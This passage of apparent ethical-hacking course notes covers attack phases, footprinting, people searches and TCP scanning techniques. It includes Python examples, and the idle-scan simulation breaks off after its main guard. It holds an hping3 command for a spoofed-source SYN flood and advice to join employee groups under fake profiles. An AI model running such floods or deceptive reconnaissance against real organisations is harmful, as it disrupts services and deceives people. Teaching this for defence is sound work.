A hacker’s chances of gaining access to a target system depend on several factors such as the architecture and configuration of the target system, the skill level of the perpetrator, and the initial level of access obtained. Once an attacker gains access to the target system, they then try to escalate privileges in order to take complete control. In the process, they also compromise the intermediate systems that are connected to it.

4. Hacking Phase: Maintaining Access

Maintaining access refers to the phase when the attacker tries to retain his or her ownership of the system. Once an attacker gains access to the target system with admin or root-level privileges (thus owning the system), they can use both the system and its resources at will. The attacker can either use the system as a launchpad to scan and exploit other systems or keep a low profile and continue their exploitation. Both of these actions can cause a great amount of damage. For instance, the hacker could implement a sniffer to capture all network traffic, including Telnet and FTP (file transfer protocol) sessions with other systems, and then transmit that data wherever they please. Attackers who choose to remain undetected remove evidence of their entry and install a backdoor or a trojan to gain repeat access. They can also install rootkits at the kernel level to gain full administrative access to the target computer. Rootkits gain access at the operating system level, while trojans gain access at the application level. Both rootkits and trojans require users to install them locally. In Windows systems, most trojans install themselves as a service and run as part of the local system with administrative access. Attackers can upload, download, or manipulate data, applications, and configurations on the owned system and can also use trojans to transfer usernames, passwords, and any other information stored on the system. They can maintain control over the system for a long time by closing up vulnerabilities to prevent other hackers from taking control of it, and sometimes, in the process, render some degree of protection to the system from other attacks. Attackers use the compromised system to launch further attacks.

5. Hacking Phase: Clearing Tracks

For obvious reasons, such as avoiding legal trouble and maintaining access, attackers will usually attempt to erase all evidence of their actions. Clearing tracks refers to the activities carried out by an attacker to hide malicious acts. The attacker’s intentions include continuing access to the victim’s system, remaining unnoticed and uncaught, and deleting evidence that might lead to their own prosecution. They use utilities such as PsTools (https://docs.microsoft.com), Netcat, or trojans to erase their footprints from the system’s log files. Once the trojans are in place, the attacker has most likely gained total control of the system and can execute scripts in the trojan or rootkit to replace the critical system and log files to hide their presence in the system. Attackers always cover their tracks to hide their identity. Other techniques include steganography and tunneling. Steganography is the process of hiding data in other data, for instance, in image and sound files. Tunneling takes advantage of the transmission protocol by carrying one protocol over another. Attackers can use even a small amount of extra space in the data packet’s TCP and IP headers to hide information. An attacker can use the compromised system to launch new attacks against other systems or as a means of reaching another system on the network undetected. Thus, this phase of the attack can turn into another attack’s reconnaissance phase. System administrators can deploy host-based IDS (intrusion detection systems) and antivirus software in order to detect trojans and other seemingly compromised files and directories.
An ethical hacker must be aware of the tools and techniques that attackers deploy so that they can advocate and implement the countermeasures detailed in subsequent modules.


MODULE 02: HOW TO


FOOTPRINTING THROUGH SEARCH ENGINES

Attackers use search engines to extract information about a target such as technology platforms, employee details, login pages, intranet portals, etc., which helps in performing social engineering and other types of advanced system attacks. Search engine caches and internet archives may also provide sensitive information that has been removed from the World Wide Web (WWW).

FINDING COMPANY'S PUBLIC AND RESTRICTED WEBSITES

Search for the target company's external URL in a search engine such as Google, Bing, etc. Restricted URLs provide an insight into different departments and business units in an organization. You may find a company's restricted URLs by a trial-and-error method or by using a service such as http://www.netcraft.com

DETERMINING THE OPERATING SYSTEM

Use the Netcraft tool to determine the OSes in use by the target organization. Use the SHODAN search engine, which lets you find specific computers (routers, servers, etc.) using a variety of filters. Censys: https://www.censys.io/

COLLECT LOCATION INFORMATION

Use the Google Earth tool to get the physical location of the target. Tools for finding the geographical location:
o Google Earth
o Google Maps
o Wikimapia
o National Geographic Maps
o Yahoo Maps
o Bing Maps

PEOPLE SEARCH: SOCIAL NETWORKING SITES/PEOPLE SEARCH SERVICES

Social networking sites are a great source of personal and organizational information. Information about an individual can be found at various people search websites. A people search returns the following information about a person or organization:
o Residential addresses and email addresses
o Contact numbers and date of birth
o Photos and social networking profiles
o Blog URLs
o Satellite pictures of private residences
o Upcoming projects and operating environment

PEOPLE SEARCH ONLINE SERVICES

o Pipl
o Truthfinder
o US Search
o BeenVerified
o Spokeo
o PeekYou
o Intelius
o Instant Checkmate
o PeopleFinder
o Whitepages
o Facebook
o LinkedIn

GATHER INFORMATION FROM FINANCIAL SERVICES

Financial services provide useful information about the target company such as the market value of a company's shares, company profile, competitor details, etc.
o Google Finance
o Yahoo! Finance

FOOTPRINTING THROUGH JOB SITES

You can gather a company's infrastructure details from job postings. Look for these:
o Job requirements
o Employee's profile
o Hardware information
o Software information

MONITORING TARGET USING ALERTS

Alerts are content monitoring services that provide up-to-date information based on your preferences, usually via email or SMS in an automated manner. Examples of alert services:
o Google Alerts - http://www.google.com/alerts
o Yahoo! Alerts - http://alerts.yahoo.com
o Twitter Alerts - https://twitter.com/alerts
o Giga Alert - http://www.gigaalert.com

INFORMATION GATHERING USING GROUPS, FORUMS, AND BLOGS

Groups, forums, and blogs provide sensitive information about a target such as public network information, system information, personal information, etc. Register with fake profiles in Google groups, Yahoo groups, etc. and try to join the target organization's employee groups where they share personal and company information.

FOOTPRINTING USING ADVANCED GOOGLE HACKING TECHNIQUES

Query String: Google hacking refers to creating complex search queries in order to extract sensitive or hidden information.
Vulnerable Targets: It helps attackers to find vulnerable targets.
Google Operators: It uses advanced Google search operators to locate specific strings of text within the search results.

GOOGLE ADVANCED SEARCH OPERATORS

Google supports several advanced operators that help in modifying the search:
o [cache:] Displays the web pages stored in the Google cache
o [link:] Lists web pages that have links to the specified web page
o [related:] Lists web pages that are similar to a specified web page
o [info:] Presents some information that Google has about a particular web page
o [site:] Restricts the results to those websites in the given domain
o [allintitle:] Restricts the results to those websites with all of the search keywords in the title
o [intitle:] Restricts the results to documents containing the search keyword in the title
o [allinurl:] Restricts the results to those with all of the search keywords in the URL
o [inurl:] Restricts the results to documents containing the search keyword in the URL

GOOGLE HACKING DATABASES

o Google Hacking Database (GHDB): http://www.hackersforcharity.org
o Google Dorks: http://www.exploit-db.com

INFORMATION GATHERING USING GOOGLE ADVANCED SEARCH

Use the Google Advanced Search option to find sites that may link back to the target company's website. This may extract information such as partners, vendors, clients, and other affiliations of the target website. With the Google Advanced Search option, you can search the web more precisely and accurately.


FOOTPRINTING THROUGH SOCIAL NETWORKING SITES

COLLECT INFORMATION THROUGH SOCIAL ENGINEERING ON SOCIAL NETWORKING SITES

Attackers use social engineering tricks to gather sensitive information from social networking websites such as Facebook, MySpace, LinkedIn, Twitter, Pinterest, Google+, etc. Attackers create a fake profile on social networking sites and then use the false identity to lure employees into giving up their sensitive information.
o fake id generator

Employees may post personal information such as date of birth, educational and employment backgrounds, spouses' names, etc. and information about their company such as potential clients and business partners, trade secrets of the business, websites, the company's upcoming news, mergers, acquisitions, etc. Attackers collect information about employees' interests by tracking their groups and then trick the employees into revealing more information.

INFORMATION AVAILABLE ON SOCIAL NETWORKING SITES

HUNT DOWN SOCIAL MEDIA ACCOUNTS BY USERNAMES WITH SHERLOCK Sherlock, a powerful command line tool provided by Sherlock Project, can be used to find usernames across many social networks. It requires Python 3.6 or higher and works on MacOS, Linux and Windows. 

https://sherlock-project.github.io/


WEBSITE FOOTPRINTING

Website footprinting refers to monitoring and analyzing the target organization's website for information. Browsing the target website may provide:
o Software used and its version
o Operating system used
o Sub-directories and parameters
o Filename, path, database field name, or query
o Scripting platform
o Contact details and CMS details

Use Burp Suite, Zaproxy, Paros Proxy, Website Informer, Firebug, etc. to view headers that provide:
o Connection status and content-type
o Accept-Ranges
o Last-Modified information
o X-Powered-By information
o Web server in use and its version

Examining the HTML source provides:
o Comments in the source code
o Contact details of the web developer or admin
o File system structure
o Script type

Examining cookies may provide:
o Software in use and its behavior
o Scripting platforms used

WEBSITE FOOTPRINTING USING WEB SPIDERS

Web spiders perform automated searches on the target websites and collect specified information such as employee names, email addresses, etc. Attackers use the collected information to perform further footprinting and social engineering attacks.
o GSA Email Spider: http://email.spider.gsa-online.de
o Web Data Extractor: http://webextractor.com

MIRRORING ENTIRE WEBSITE

Mirroring an entire website onto the local system enables an attacker to browse the website offline; it also assists in finding the directory structure and other valuable information from the mirrored copy without sending multiple requests to the web server. Web mirroring tools allow you to download a website to a local directory, recursively building all directories, HTML, images, flash, videos, and other files from the server on your computer.
o wget -m
o HTTrack Web Site Copier: http://www.httrack.com
o SurfOffline: http://www.surfoffline.com

EXTRACT WEBSITE INFORMATION

From http://www.archive.org: the Internet Archive's Wayback Machine allows you to visit archived websites.
o Google cache:

EMAIL FOOTPRINTING

GATHER E-MAIL ACCOUNTS, SUBDOMAINS, HOSTS, EMPLOYEE NAMES

The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and the SHODAN computer database. This tool is intended to help penetration testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization.

theHarvester - https://github.com/laramies/theHarvester

TRACKING EMAIL COMMUNICATIONS

Email tracking is used to monitor the delivery of emails to an intended recipient. Attackers track emails to gather information about a target recipient in order to perform social engineering and other attacks:
o Get the recipient's system IP address
o Geolocation of the recipient
o When the email was received and read
o Whether or not the recipient visited any links sent to them
o Get the recipient's browser and operating system information
o Time spent reading the emails

COLLECTING INFORMATION FROM EMAIL HEADER

EMAIL TRACKING TOOLS

o eMailTrackerPro: http://www.emailtrackerpro.com
o PoliteMail: http://www.politemail.com
o Email Lookup - Free Email Tracker: http://www.ipaddresslocation.org

WHOIS FOOTPRINTING

WHOIS LOOKUP

WHOIS databases are maintained by Regional Internet Registries and contain the personal information of domain owners. A WHOIS query returns:
o Domain name details
o Contact details of the domain owner
o Domain name servers
o NetRange
o When a domain was created
o Expiry records
o Records last updated

Information obtained from the WHOIS database assists an attacker to:
o Gather personal information that assists in performing social engineering

Regional Internet Registries (RIRs):
o AFRINIC (African Network Information Center)
o ARIN (American Registry for Internet Numbers)
o APNIC (Asia Pacific Network Information Center)
o RIPE (Reseaux IP Europeens Network Coordination Centre)
o LACNIC (Latin American and Caribbean Network Information Center)

Browse to http://whois.domaintools.com in a browser and type any domain name. For example, let’s search pentestlab.in


DNS FOOTPRINTING

EXTRACTING DNS INFORMATION

Attackers can gather DNS information to determine key hosts in the network and can perform social engineering attacks. DNS records provide important information about the location and type of servers.

DNS Interrogation Tools:
o https://www.whatsmydns.net/
o https://dnsinspect.com/
  Name -> IP
  IP -> Name
o Service -> Name
o Linux host command
o GET dns.google.com
o Dnsdumpster

PERFORM A REVERSE DNS LOOKUP

A Reverse DNS (Domain Name System) Lookup is merely the opposite sequence of a DNS lookup. With a normal DNS lookup, you query the DNS name or hostname to get the IP address; with a Reverse DNS Lookup, you query the IP address to find the hostname. Therefore, by entering the IP address into the Reverse DNS Lookup Tool, you are able to find the domain name associated with the corresponding IP. Numerous online tools can be used to perform an rDNS lookup. A few examples of these online tools are linked below:
o MXToolbox.com
o Whatismyip.com
o IPLocation.net

You can also perform an rDNS lookup manually from the command line. In Linux, the command you would use is “dig” with the added “-x” flag. If you are on a Windows computer, you would typically use the “nslookup” command, though you could also use “ping -a”.
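As an added example (not from the book), the following Python code shows what a “dig -x” query actually asks for, the PTR owner name derived from the address, and adds the forward-confirmed check a defender should apply before trusting a hostname resolved from an IP in a log; the PTR and A records are constructed stand-ins for real DNS answers.

```python
"""What 'dig -x <ip>' does under the hood, plus a forward-confirmed rDNS check.

Added example, not from the book. A reverse lookup is an ordinary DNS query
for a PTR record whose owner name is built from the address: the octets
reversed under in-addr.arpa for IPv4, the 32 hex nibbles reversed under
ip6.arpa for IPv6. The record tables below are constructed so it runs offline.
"""
import ipaddress


def reverse_pointer_name(ip):
    """Build the PTR owner name that `dig -x <ip>` queries (IPv4 or IPv6)."""
    addr = ipaddress.ip_address(ip)
    if addr.version == 4:
        octets = str(addr).split(".")
        return ".".join(reversed(octets)) + ".in-addr.arpa"
    # IPv6: expand to the full 32 nibbles, reverse them, dot-separate.
    nibbles = addr.exploded.replace(":", "")
    return ".".join(reversed(nibbles)) + ".ip6.arpa"


# Constructed PTR and A records standing in for real DNS answers.
PTR_RECORDS = {
    "10.113.0.203.in-addr.arpa": "mail.example.com",
    # Constructed "forged" PTR: the name it returns does not point back here.
    "55.2.0.192.in-addr.arpa": "www.example.org",
}
A_RECORDS = {
    "mail.example.com": {"203.0.113.10"},
    "www.example.org": {"192.0.2.80"},
}


def reverse_lookup(ip, ptr_records=PTR_RECORDS):
    """Answer the PTR query from the constructed table (None if no record)."""
    return ptr_records.get(reverse_pointer_name(ip))


def forward_confirmed(ip, ptr_records=PTR_RECORDS, a_records=A_RECORDS):
    """Forward-confirmed reverse DNS (FCrDNS).

    Whoever controls the reverse zone for an address can publish any PTR
    value, so the hostname is only trusted if it resolves back to the same
    address. Returns (hostname, confirmed)."""
    hostname = reverse_lookup(ip, ptr_records)
    if hostname is None:
        return None, False
    return hostname, ip in a_records.get(hostname, set())


if __name__ == "__main__":
    for ip in ("203.0.113.10", "192.0.2.55", "2001:db8::1"):
        print(ip, "->", reverse_pointer_name(ip), forward_confirmed(ip))
```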


NETWORK FOOTPRINTING

LOCATE THE NETWORK RANGE

Network range information assists attackers in creating a map of the target network. Find the range of IP addresses using the ARIN whois database search tool. You can find the range of IP addresses and the subnet mask used by the target organization from the Regional Internet Registry (RIR).

TRACEROUTE

Traceroute programs work on the concept of the ICMP protocol and use the TTL field in the header of ICMP packets to discover the routers on the path to a target host.
o Manual traceroute: ping -i 1
o UDP 33434-33534 Random
o ICMP type 3: Destination Unreachable
o ICMP type 11: Time Exceeded

TRACEROUTE ANALYSIS

Attackers conduct traceroute to extract information about network topology, trusted routers, and firewall locations. For example, after running several traceroutes, an attacker might obtain the following information:
o traceroute 1.10.10.20, second to last hop is 1.10.10.1
o traceroute 1.10.10.20, third to last hop is 1.10.10.1
o traceroute 1.10.20.10, second to last hop is 1.10.10.50
o traceroute 1.10.20.15, third to last hop is 1.10.10.1
o traceroute 1.10.20.15, second to last hop is 1.10.10.50

By putting this information together, attackers can draw the network diagram.

TRACEROUTE TOOLS

o https://www.ultratools.com/tools/traceRoute
o https://www.uptrends.com/tools/traceroute
o https://tools.keycdn.com/traceroute
o https://ping.eu/traceroute/


FOOTPRINTING TOOLS

Recon-ng
o Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built-in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.

Maltego
o Maltego is software used for open-source intelligence and forensics, developed by Paterva from Pretoria, South Africa. Maltego focuses on providing a library of transforms for discovery of data from open sources, and visualizing that information in a graph format, suitable for link analysis and data mining.

FOCA
o FOCA is a tool used mainly to find metadata and hidden information in the documents it scans. These documents may be on web pages, and can be downloaded and analysed with FOCA.

OSRFramework
o OSRFramework is a GNU AGPLv3+ set of libraries developed by i3visio to perform Open Source Intelligence collection tasks. They include references to a bunch of different applications related to username checking, DNS lookups, information leaks research, deep web search, regular expressions extraction and many others. At the same time, by means of ad-hoc Maltego transforms, OSRFramework provides a way of making these queries graphically as well as several interfaces to interact with, like OSRFConsole or a Web interface.

BillCipher
o An information gathering tool for a website or IP address that uses some ideas from Devploit. BillCipher can work on any operating system that has and supports Python 2, Python 3, and Ruby.

OSINT Framework
o An OSINT framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost.


NETWORK SCANNING

Network scanning refers to a set of procedures for identifying hosts, ports, and services in a network. It is one of the components of intelligence gathering that an attacker uses to create a profile of the target organisation.
Objectives of network scanning:
o Discover live hosts, their IP addresses, and their open ports
o Discover operating systems and system architectures
o Discover the services running on hosts
o Discover vulnerabilities in live hosts

TCP COMMUNICATION FLAGS

URG (Urgent): the data the urgent pointer points to should be processed immediately
FIN (Finish): the sender has no more data to transmit
RST (Reset): aborts the connection
PSH (Push): deliver the buffered data to the application immediately
ACK (Acknowledgement): the acknowledgement number field is valid; acknowledges received data
SYN (Synchronize): initiates a connection between hosts (sequence numbers are synchronised)
Scanners work by sending segments with unusual flag combinations and watching how the target's TCP stack reacts, as the scan types later in this chapter show.

TCP/IP COMMUNICATION

CREATING CUSTOM PACKETS USING TCP FLAGS

Colasoft Packet Builder lets you create custom network packets to audit networks against various attacks. Attackers can also use it to craft fragmented packets in an attempt to bypass the firewalls and IDSs on a network.
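To make the flag bits concrete, here is an added example in Python (not from the book, and unrelated to Colasoft Packet Builder) that builds a raw 20-byte TCP header with any combination of these flags and a correct checksum, and decodes one back. The addresses, ports and probe names are illustrative. It only constructs bytes: putting them on the wire needs a raw socket (root) or a tool such as hping3 or Scapy. The flag sets in PROBES are the ones the SYN, ACK, FIN, NULL and Xmas scans described later in this chapter send.

```python
import struct
import ipaddress

# TCP flag bits, as laid out in the low byte of the offset/flags word (RFC 793).
TCP_FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04,
             "PSH": 0x08, "ACK": 0x10, "URG": 0x20}

# Flag combinations used by the scan types in this chapter (illustrative names).
PROBES = {
    "syn":  ("SYN",),                # half-open / SYN scan
    "ack":  ("ACK",),                # ACK flag probe
    "fin":  ("FIN",),                # inverse flag scan
    "null": (),                      # NULL scan: no flags at all
    "xmas": ("FIN", "PSH", "URG"),   # Xmas scan
}


def encode_flags(names):
    """OR the named flags into the 6-bit flags field."""
    value = 0
    for name in names:
        value |= TCP_FLAGS[name]
    return value


def decode_flags(value):
    """Names of the flags set in `value`, in header bit order (FIN first)."""
    return [name for name, bit in sorted(TCP_FLAGS.items(), key=lambda kv: kv[1])
            if value & bit]


def internet_checksum(data):
    """RFC 1071 ones'-complement checksum over `data` (odd length is zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _pseudo_header(src_ip, dst_ip, tcp_length):
    """IPv4 pseudo-header that the TCP checksum also covers (protocol 6 = TCP)."""
    return struct.pack("!4s4sBBH", ipaddress.IPv4Address(src_ip).packed,
                       ipaddress.IPv4Address(dst_ip).packed, 0, 6, tcp_length)


def build_tcp_segment(src_ip, dst_ip, src_port, dst_port, flags,
                      seq=0, ack=0, window=1024):
    """Build a 20-byte TCP header (no options, no payload) with a valid checksum."""
    data_offset = 5 << 4                      # 5 x 32-bit words, reserved bits zero
    header = struct.pack("!HHIIBBHHH", src_port, dst_port, seq, ack,
                         data_offset, encode_flags(flags), window, 0, 0)
    csum = internet_checksum(_pseudo_header(src_ip, dst_ip, len(header)) + header)
    return header[:16] + struct.pack("!H", csum) + header[18:]   # checksum at bytes 16-17


def parse_tcp_segment(segment):
    """Decode the fixed part of a TCP header into a dict."""
    (src_port, dst_port, seq, ack, offset_byte,
     flag_byte, window, csum, urgent) = struct.unpack("!HHIIBBHHH", segment[:20])
    return {"src_port": src_port, "dst_port": dst_port, "seq": seq, "ack": ack,
            "header_len": (offset_byte >> 4) * 4, "flags": decode_flags(flag_byte),
            "window": window, "checksum": csum, "urgent": urgent}


def checksum_ok(src_ip, dst_ip, segment):
    """With a correct checksum, the sum over pseudo-header + segment folds to zero."""
    return internet_checksum(_pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


if __name__ == "__main__":
    for name, flags in PROBES.items():
        seg = build_tcp_segment("192.0.2.10", "192.0.2.20", 40000, 80, flags)
        print("%-5s flags=0x%02x  %s" % (name, encode_flags(flags), seg.hex()))
```

The checksum covers a pseudo-header with both IP addresses, which is why spoofing the source address (as the idle scan and hping's -a option do) requires recomputing it; a segment with a stale checksum is silently discarded by the receiving stack and never produces the RST or SYN/ACK the scan is waiting for.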


CHECK FOR LIVE SYSTEMS
CHECKING FOR LIVE SYSTEMS - ICMP SCANNING

A ping scan sends an ICMP Echo Request to a host; a live host returns an ICMP Echo Reply. This is useful for locating active devices and for determining whether ICMP is allowed through a firewall. No reply does not prove the host is down: many hosts and firewalls silently drop Echo Requests, which is why Nmap's host discovery also sends TCP probes, and ARP requests on the local network.

PING SWEEP

A ping sweep determines the live hosts in a range of IP addresses by sending ICMP Echo Requests to many hosts; each live host returns an ICMP Echo Reply. Attackers use a subnet mask calculator to work out how many hosts a subnet contains, then ping sweep it to build an inventory of live systems. The same caveat applies as above: hosts that drop ICMP will be missing from that inventory.

PING SWEEP TOOLS

Angry IP Scanner pings each IP address to check whether it is alive, then optionally resolves its hostname, determines the MAC address, scans ports, and so on.
SolarWinds Engineer's Toolset Ping Sweep scans a range of IP addresses to identify which are in use and which are currently free; it also performs reverse DNS lookups.


CHECK FOR OPEN PORTS
SSDP SCANNING

The Simple Service Discovery Protocol (SSDP) works together with UPnP to discover plug-and-play devices on a network. Vulnerabilities in UPnP implementations have allowed attackers to launch buffer overflow and DoS attacks. An attacker can use a UPnP SSDP M-SEARCH discovery tool to check whether a machine exposes UPnP and may be vulnerable to UPnP exploits.
o SSDP uses UDP on port 1900
o Discovery requests are sent to the multicast address 239.255.255.250:1900

SCANNING IN IPV6 NETWORKS

IPv6 increases the address size from 32 bits to 128 bits to support more levels of addressing hierarchy. Traditional scanning techniques become computationally infeasible because of the much larger search space: a single IPv6 subnet has 64 bits of host address space (2^64 addresses). Scanning an IPv6 network is therefore harder than IPv4, and some scanning tools do not support ping sweeps on IPv6 networks. Attackers instead harvest IPv6 addresses from network traffic, recorded logs, DNS, and the Received: and other header lines in archived e-mail or Usenet messages. The flip side is that once an attacker has compromised one host in a subnet, that subnet offers a large number of reachable hosts: from the compromised host the attacker can probe the link-local "all nodes" multicast address (ff02::1), which every IPv6 host on the link listens to, and tools such as Nmap (-6) support such on-link scans.

SCANNING TOOL: NMAP

Network administrators use Nmap for network inventory, managing service upgrade schedules, and monitoring host or service uptime. Attackers use Nmap to extract information such as the live hosts on a network, the services running (application name and version), the type of packet filter or firewall in place, and operating systems and their versions.

HPING2/HPING3

A command-line network scanning and packet-crafting tool for the TCP/IP protocol suite. It can be used for network security auditing, firewall testing, manual path MTU discovery, advanced traceroute, remote OS fingerprinting, remote uptime guessing, TCP/IP stack auditing, and more.

HPING COMMANDS

ICMP ping: hping3 -1 10.0.0.25
ACK scan on port 80: hping3 -A 10.0.0.25 -p 80
UDP scan on port 80: hping3 -2 10.0.0.25 -p 80
Collecting the Initial Sequence Number: hping3 192.168.1.103 -Q -p 139 -s
Firewalls and timestamps: hping3 -S 72.14.207.99 -p 80 --tcp-timestamp
SYN scan on ports 50-60: hping3 -8 50-60 -S 10.0.0.25 -V
FIN, PUSH and URG scan on port 80: hping3 -F -P -U 10.0.0.25 -p 80
Scan an entire subnet for live hosts: hping3 -1 10.0.1.x --rand-dest -I eth0
Intercept all traffic containing an HTTP signature: hping3 -9 HTTP -I eth0
SYN flooding a victim with a spoofed source: hping3 -S 192.168.1.1 -a 192.168.1.254 -p 22 --flood
Option summary: -1 ICMP mode, -2 UDP mode, -8 scan mode, -9 listen mode; -S, -A, -F, -P and -U set the SYN, ACK, FIN, PSH and URG flags; -p is the destination port, -I the interface, -a spoofs the source address (replies then go to the spoofed host, not to you), and --flood sends as fast as possible without waiting for replies.

SCANNING TECHNIQUES

Scanning TCP network services:
o Open TCP scanning methods
  - TCP Connect / Full Open Scan
o Stealth TCP scanning methods
  - Half-open (SYN) Scan
  - Inverse TCP Flag Scanning
  - Xmas Scan
  - FIN Scan
  - NULL Scan
  - ACK Flag Probe Scanning
o Third-party and spoofed TCP scanning methods
  - IDLE / IP ID Header Scanning
Scanning UDP network services:
o UDP Scanning

TCP CONNECT / FULL OPEN SCAN (-sT)

A TCP Connect scan detects an open port by completing the three-way handshake through the operating system's connect() call. The full connection is established and then immediately closed. Because no raw packets are crafted, it does not require superuser privileges, but the completed connection is visible to the listening application and will appear in its logs.

STEALTH SCAN (HALF-OPEN SCAN) (-sS)

A stealth (SYN) scan aborts the TCP connection before the three-way handshake completes, leaving it half open. Because the handshake never completes, the listening application never receives a connection and never logs one; attackers use it to avoid application-level logging and to look like ordinary connection attempts. It does not bypass a firewall: a packet filter sees the SYN exactly like any other connection attempt.
Stealth scan process:
1. The client sends a single SYN packet to the server on the chosen port.
2. If the port is open, the server responds with a SYN/ACK packet.
3. If the server responds with a RST packet, the remote port is in the closed state.
4. On receiving a SYN/ACK, the client sends a RST to abort the handshake before a connection is ever established.
Crafting the raw SYN and RST packets requires raw sockets, so Nmap needs root/administrator privileges for -sS.

INVERSE TCP FLAG SCANNING (-sF, -sN)

Attackers send TCP probe packets with a single flag (FIN, URG or PSH) set, or with no flags at all. Per RFC 793 a closed port answers such a probe with a RST while an open port stays silent, so no response means open and a RST means closed. Because a probe dropped by a firewall also produces no response, Nmap reports silent ports as open|filtered.
Note: inverse TCP flag scanning is called FIN, URG or PSH scanning according to the flag set in the probe packet (Nmap's -sF is the FIN scan). With no flags set it is called NULL scanning (-sN).

XMAS SCAN (-sX)

In an Xmas scan the attacker sends a TCP segment to the remote device with the FIN, URG and PSH flags set (the packet is "lit up like a Christmas tree"). Like the FIN and NULL scans, it works only against operating systems whose TCP/IP stack follows RFC 793 by answering a probe to a closed port with a RST and ignoring one to an open port. It does not work against any version of Microsoft Windows, nor against many Cisco devices and some other stacks, which send a RST whether the port is open or closed, so every port appears closed.

ACK FLAG PROBE SCANNING (-sA)

Attackers send TCP probe packets with the ACK flag set to a remote device and analyse the header fields (TTL and WINDOW) of the RST packets that come back to decide whether a port is open or closed.
TTL-based ACK flag probe scanning:
o If the TTL value of the RST packet for a particular port is less than the boundary value of 64, that port is open.
WINDOW-based ACK flag probe scanning:
o If the WINDOW value of the RST packet for a particular port is non-zero, that port is open.
Both heuristics depend on quirks of old TCP/IP stacks that leak port state into the RST; most current systems send identical RSTs for open and closed ports. For that reason Nmap's -sA only classifies ports as filtered or unfiltered, and the window-size variant is a separate scan type (-sW) that works against only a minority of hosts.


ACK flag probe scanning can also be used to map the target's filtering. Attackers send an ACK probe with a random sequence number: no response means the port is filtered (a stateful firewall is dropping packets that belong to no existing connection), while a RST response means the port is unfiltered. Unfiltered does not mean open: open and closed ports alike answer a stray ACK with a RST.

IDLE / IP ID HEADER SCAN (-sI)

Most network servers listen on TCP ports, such as web servers on port 80 and mail servers on port 25. A port is considered open if an application is listening on it. One way to determine whether a port is open is to send a SYN (session establishment) packet to it: the target machine sends back a SYN/ACK (session request acknowledgement) if the port is open and a RST (reset) if it is closed. A machine that receives an unsolicited SYN/ACK responds with a RST; an unsolicited RST is ignored. Every IP packet carries a fragment identification number (IP ID). Many operating systems increment the IP ID by one for each packet they send, so probing a host's IP ID twice tells an attacker how many packets it sent between the two probes. That counter is the side channel the idle scan exploits: the attacker never talks to the target directly, but reads off the zombie whether the zombie had to answer the target. The scan only works with a zombie whose IP ID counter is global and incremental and which sends little other traffic; stacks that randomise the IP ID or keep a per-connection counter are unusable as zombies.

IDLE SCAN: STEPS 1/2/3
Step 1:
Send a SYN/ACK packet to the zombie machine to probe its IP ID. Every IP packet carries a fragment identification number (IP ID); on a stack with a global incremental counter it increases by one for every packet the host sends. A zombie that is not expecting a SYN/ACK replies with a RST, disclosing its current IP ID. Record the IP ID from that RST.

Step 2:
Send a SYN packet to the target machine (for example to port 80) with the source address spoofed to the zombie's IP. If the port is open, the target sends a SYN/ACK to the zombie, and the zombie answers that unexpected SYN/ACK with a RST, consuming one IP ID. If the port is closed, the target sends a RST to the zombie, and the zombie ignores it, sending nothing.

Step 3:
Probe the zombie's IP ID again with another SYN/ACK and compare: if it has increased by 2 (the zombie's RST to the target plus its RST to you), the port is open; if it increased by 1 (only the RST to you), the port is closed or filtered. Any other difference means the zombie was sending other traffic and is not idle enough to be used. Nmap runs this as nmap -sI <zombie> <target> and first checks that the zombie's IP ID sequence is really incremental and quiet.
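The three steps can be followed packet by packet in a small simulation. The following Python script is an added example (not from the book and not Nmap's code): it models each host as a TCP/IP stack with a single incrementing IP ID counter and the two RFC 793 reactions the scan depends on, runs the probe/spoof/probe sequence against an open and a closed port, and shows why a zombie that is busy with its own traffic gives an inconclusive answer. Host names, addresses and ports are illustrative.

```python
class Host:
    """Minimal model of a TCP/IP stack with one global IP ID counter that
    increments by one for every packet sent (the behaviour the idle scan relies on)."""

    def __init__(self, name, ip, open_ports=(), ipid_start=1000, background=0):
        self.name = name
        self.ip = ip
        self.open_ports = set(open_ports)
        self.ipid = ipid_start
        self.background = background   # unrelated packets this host emits per event
        self.sent = []                 # log of everything this host transmitted

    def send(self, dst, flags, dport=0):
        self.ipid += 1                 # every transmitted packet consumes one IP ID
        pkt = {"src": self.ip, "dst": dst, "flags": flags, "dport": dport, "ipid": self.ipid}
        self.sent.append(pkt)
        return pkt

    def receive(self, pkt):
        """Apply the RFC 793 reactions the scan depends on; return the reply or None."""
        for _ in range(self.background):           # a busy host is not 'idle'
            self.send("198.51.100.1", "DATA")
        if pkt["flags"] == "SYN":
            # SYN to an open port -> SYN/ACK; SYN to a closed port -> RST
            reply = "SYN/ACK" if pkt["dport"] in self.open_ports else "RST"
            return self.send(pkt["src"], reply)
        if pkt["flags"] == "SYN/ACK":
            return self.send(pkt["src"], "RST")    # unexpected SYN/ACK -> RST
        return None                                 # an unexpected RST is ignored


def probe_ipid(attacker, zombie):
    """Steps 1 and 3: SYN/ACK to the zombie; its RST reveals the current IP ID."""
    reply = zombie.receive(attacker.send(zombie.ip, "SYN/ACK"))
    return reply["ipid"]


def zombie_is_usable(attacker, zombie):
    """Two back-to-back probes must differ by exactly one, or the zombie is too noisy."""
    return probe_ipid(attacker, zombie) + 1 == probe_ipid(attacker, zombie)


def idle_scan_port(attacker, zombie, target, port):
    before = probe_ipid(attacker, zombie)
    # Step 2: SYN to the target with the source forged as the zombie. The attacker
    # never sees the answer; only the zombie does, and only an open port makes it talk.
    spoofed = {"src": zombie.ip, "dst": target.ip, "flags": "SYN", "dport": port, "ipid": 0}
    reply = target.receive(spoofed)
    if reply is not None:
        zombie.receive(reply)
    delta = probe_ipid(attacker, zombie) - before
    if delta == 2:
        return "open"
    if delta == 1:
        return "closed|filtered"
    return "inconclusive (IP ID moved by %d; zombie not idle)" % delta


if __name__ == "__main__":
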